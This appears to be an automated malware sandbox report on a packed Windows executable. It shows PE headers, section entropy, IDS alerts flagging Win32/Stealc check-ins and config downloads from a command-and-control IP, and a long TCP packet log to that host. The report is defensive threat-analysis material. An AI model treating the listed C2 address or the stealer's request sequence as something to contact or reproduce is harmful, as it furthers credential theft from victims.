add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 0000000Ah
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x25d050	0x64	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x25d1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x25b000	0x22800	a03c45e5f91ec13e440adedb7bea6f7c	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x25c000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x25d000	0x1000	0x200	c60c4959cc8d384ac402730cc6842bb0	False	0.1328125	data	0.9064079259880791	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x25e000	0x29b000	0x200	82f682c17b9ac6cac5db5e839cc9bd49	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
qrqcuroh	0x4f9000	0x199000	0x198c00	760b65783c5ac91fc80bdf8fc317fece	False	0.9951864726681957	data	7.954103653364646	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ofoequcp	0x692000	0x1000	0x600	2081db6c02d96dc0d69d9f6243c35862	False	0.5774739583333334	data	5.060041392043553	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x693000	0x3000	0x2200	f8da29aaf9d0934da39806d6d75378a9	False	0.05939797794117647	DOS executable (COM)	0.7450808637682007	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-02T18:19:17.742293+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	49737	185.215.113.37	80	TCP
2024-10-02T18:19:17.979029+0200	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.4	49737	185.215.113.37	80	TCP
2024-10-02T18:19:17.985578+0200	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.37	80	192.168.2.4	49737	TCP
2024-10-02T18:19:18.215036+0200	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.4	49737	185.215.113.37	80	TCP
2024-10-02T18:19:18.259071+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.37	80	192.168.2.4	49737	TCP
2024-10-02T18:19:19.258742+0200	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.4	49737	185.215.113.37	80	TCP
2024-10-02T18:19:19.691496+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49737	185.215.113.37	80	TCP
2024-10-02T18:19:26.153661+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49737	185.215.113.37	80	TCP
2024-10-02T18:19:27.498395+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49737	185.215.113.37	80	TCP
2024-10-02T18:19:27.969362+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49737	185.215.113.37	80	TCP
2024-10-02T18:19:29.455718+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49737	185.215.113.37	80	TCP
2024-10-02T18:19:31.735950+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49737	185.215.113.37	80	TCP
2024-10-02T18:19:32.209961+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49737	185.215.113.37	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 2, 2024 18:19:16.732867956 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:16.738028049 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:16.738110065 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:16.738249063 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:16.742994070 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:17.487626076 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:17.487763882 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:17.489846945 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:17.494800091 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:17.742175102 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:17.742292881 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:17.743563890 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:17.748469114 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:17.978913069 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:17.978969097 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:17.979028940 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:17.979057074 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:17.980488062 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:17.985578060 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:18.214893103 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:18.214998007 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:18.215034962 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:18.215035915 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:18.215063095 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:18.215069056 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:18.215076923 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:18.215102911 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:18.215107918 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:18.215138912 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:18.215143919 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:18.215179920 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:18.215236902 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:18.215275049 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:18.215430975 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:18.215470076 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:18.254127979 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:18.259071112 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:18.487371922 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:18.487668037 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:18.503730059 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:18.503766060 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:18.508629084 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:18.508805990 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:18.508821011 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:18.508832932 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:18.508846045 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:18.508939981 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:18.508953094 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.258532047 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.258742094 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.453217030 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.458682060 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.691430092 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.691447973 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.691458941 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.691495895 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.691534042 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.691546917 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.691557884 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.691582918 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.691598892 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.692013979 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.692024946 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.692042112 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.692065001 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.692074060 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.692084074 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.692087889 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.692100048 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.692116976 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.692126036 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.692157984 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.692183018 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.692199945 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.692240953 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.824151039 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.824191093 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.824201107 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.824242115 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.824259996 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.830113888 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.830123901 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.830161095 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.830178022 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.834916115 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.834928036 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.834966898 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.834979057 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.834983110 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.834992886 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.835016012 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.835031033 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.839771986 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.839782953 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.839823961 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.839834929 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.839838028 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.839843988 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.839860916 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.839889050 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.844716072 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.844731092 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.844738960 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.844748020 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.844777107 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.844791889 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.844818115 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.849622965 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.849632978 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.849674940 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.849684000 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.849699974 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.849731922 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.916490078 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.916498899 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.916568995 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.956872940 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.956927061 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.956945896 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.956981897 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.957007885 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.957045078 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.957058907 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.957094908 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.957128048 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.957231998 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.957283020 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.957289934 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.957309961 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.957328081 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.957343102 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.957357883 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.957369089 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.957386971 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.957405090 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.957923889 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.957972050 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.957982063 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.957997084 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.958023071 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.958040953 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.958065987 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.958081007 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.958108902 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.958117962 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.958131075 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.958151102 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.958952904 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.958998919 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.959006071 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.959024906 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.959049940 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.959064960 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.959121943 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.959136963 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.959161043 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.959171057 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.959198952 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.959844112 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.959857941 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.959894896 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.959902048 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.959911108 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.959923983 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.959933043 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.959950924 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.959961891 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.959979057 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.960000038 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.960020065 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.960681915 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.960730076 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.960740089 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.960757971 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.960782051 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.960798979 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.960859060 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.960874081 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.960900068 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.960951090 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.960951090 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.960992098 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.961651087 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.961699963 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.962313890 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.962359905 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.962383986 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.962403059 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.962426901 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.962444067 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.962464094 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.962477922 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:19.962503910 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:19.962517023 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.008949995 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.009181976 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.009188890 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.009203911 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.009224892 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.009241104 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.009248018 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.009268999 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.009283066 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.009293079 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.009325027 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.009334087 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.009759903 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.009804964 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.089569092 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.089607954 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.089622021 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.089643955 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.089654922 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.089663982 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.089693069 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.089739084 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.089745998 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.089759111 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.089790106 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.089798927 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.089837074 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.089884043 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.089900017 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.089947939 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.089966059 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.090006113 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.090056896 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.090075970 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.090097904 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.090110064 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.090127945 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.090166092 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.090270042 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.090320110 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.090344906 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.090359926 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.090387106 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.090395927 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.090408087 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.090428114 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.090534925 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.090579987 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.090604067 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.090616941 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.090647936 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.090662003 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.090713978 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.090758085 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.090780973 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.090795994 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.090822935 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.090837002 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.090905905 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.090919971 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.090946913 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.090955973 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.090966940 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.090981960 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.090990067 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.091028929 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.091375113 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.091417074 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.091425896 CEST	49737	80	192.168.2.4	185.215.113.37
